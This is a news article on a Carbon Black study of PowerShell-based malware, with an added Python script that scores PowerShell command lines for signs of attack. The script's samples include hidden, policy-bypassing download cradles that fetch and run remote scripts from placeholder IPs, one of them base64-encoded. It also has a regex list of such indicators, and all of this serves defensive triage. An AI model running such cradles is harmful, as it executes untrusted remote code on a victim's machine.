According to a study by Carbon Black, Microsoft's PowerShell task automation framework is increasingly being used to build and enhance malware.
The data, collected from over 1,100 separate investigations by 20 security firms, shows that PowerShell was used in 38% of the attacks analyzed. In 31% of those cases, respondents said, their clients had received no alert about the attack while it was under way.
PowerShell is a favorite tool both for targeted attacks and for commodity malware. In 87% of the cases, the PowerShell malware was part of a shotgun approach; in the remainder it belonged to a targeted attack by a specific criminal group or state-sponsored actor.
Shotgun-approach malware means commodity threats such as ransomware, click-fraud bots, and similar, where the attacker does not care whom they infect as long as they infect someone.
According to Carbon Black, over half of these incidents involved Vawtrak, a banking trojan that makes heavy use of PowerShell.
Respondents stated that PowerShell-based malware was usually delivered through social engineering and that it mostly targeted corporate networks and financial data, aiming to steal information or disrupt services.
Because PowerShell is ubiquitous in the Windows ecosystem, PowerShell-based malware is hard to detect: the interpreter is a signed, trusted Microsoft binary, and a script's source alone does not tell you whether it is benign or malicious. What defenders can do is make its activity visible. Process-creation auditing records the full command line, PowerShell 5.0 adds script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and transcription, and the Antimalware Scan Interface (AMSI) hands de-obfuscated script content to the installed antivirus at execution time; the flag combinations and download cradles that attack tooling favors can then be flagged in that telemetry.
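As an added example of what that telemetry-driven triage looks like (this code is not from the article or the Carbon Black report), the following script scores PowerShell command lines of the kind recorded in Windows Security 4688 or Sysmon event ID 1. It decodes -EncodedCommand payloads (base64 of UTF-16LE text, the transform PowerShell itself applies) so the hidden script is scanned as well, and it tolerates malformed blobs. The indicator weights, the alert threshold, the sample command lines and the IP addresses are all constructed for the example.

```python
"""Triage PowerShell command lines from process-creation logs.

Added example, not code from the article or the Carbon Black report.
The indicator weights and threshold are this example's assumptions, and the
sample command lines (including the IP addresses) are constructed.
"""
import base64
import re

# Weighted indicators commonly combined by PowerShell attack tooling.
INDICATORS = [
    (r"\bIEX\b|Invoke-Expression", "invoke-expression", 2),
    (r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", "download cradle", 3),
    (r"FromBase64String", "inline base64 decode", 2),
    (r"(?i)-w\w*\s+(?:hidden|1)\b", "hidden window", 2),   # -w hidden or -WindowStyle 1
    (r"(?i)-(?:ep|ex\w*)\s+bypass", "execution policy bypass", 2),
    (r"(?i)-nop\w*", "no profile", 1),                    # also common in admin scripts
]

# -e, -ec, -en, -enc or -EncodedCommand followed by the base64 blob.
ENCODED_RE = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def encode_command(script: str) -> str:
    """Same transform as [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($s))."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str):
    """Reverse of encode_command; returns None for invalid base64 or non-UTF-16LE bytes."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Score one command line; a decoded -enc payload is scanned together with it."""
    score, hits, decoded = 0, [], None
    scan_text = cmdline
    m = ENCODED_RE.search(cmdline)
    if m:
        hits.append("encoded command")
        score += 2
        decoded = decode_command(m.group(1))
        if decoded is None:
            hits.append("undecodable encoded payload")  # truncated or garbage blob
            score += 2
        else:
            scan_text = cmdline + "\n" + decoded
    for pattern, name, weight in INDICATORS:
        if re.search(pattern, scan_text):
            hits.append(name)
            score += weight
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits, "score": score}


def triage(cmdlines, threshold=5):
    """Return the analyses whose score reaches the (assumed) alert threshold."""
    return [r for r in map(analyze, cmdlines) if r["score"] >= threshold]


# Constructed sample command lines: two benign, two malicious-looking, one malformed.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -File C:\ops\rotate-logs.ps1",
    r"powershell.exe",
    "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://198.51.100.7/a.ps1')\"",
    "powershell.exe -NonI -W 1 -Enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/x')"),
    "powershell.exe -EncodedCommand QUJD",  # decodes to b'ABC', not valid UTF-16LE
]

if __name__ == "__main__":
    for r in triage(SAMPLE_COMMAND_LINES):
        print(r["score"], r["hits"])
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

The benign admin invocation scores only for -NoProfile, which is why that indicator carries a low weight: the point is that the combination of flags and a download cradle is what separates routine automation from a dropper, not any single token. In production the same logic would run over script block (4104) events as well, where AMSI-visible de-obfuscated content removes the need to decode the command line at all.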
Given these findings, the researchers expect PowerShell to become a prevalent technology in malware design, helped along by toolkits such as PowerSploit, PowerShell Empire, p0wnedShell, and the Social-Engineer Toolkit, which provide ready-to-use PowerShell attack modules out of the box.
Blocking PowerShell outright, the experts say, is impractical.
“Unlike other common technologies such as Java and Adobe Flash, which IT administrators can more easily remove or ban, many organizations and applications rely on PowerShell to manage their critical systems.”
One of the most recent PowerShell-based malware families is the so-called PowerWare ransomware.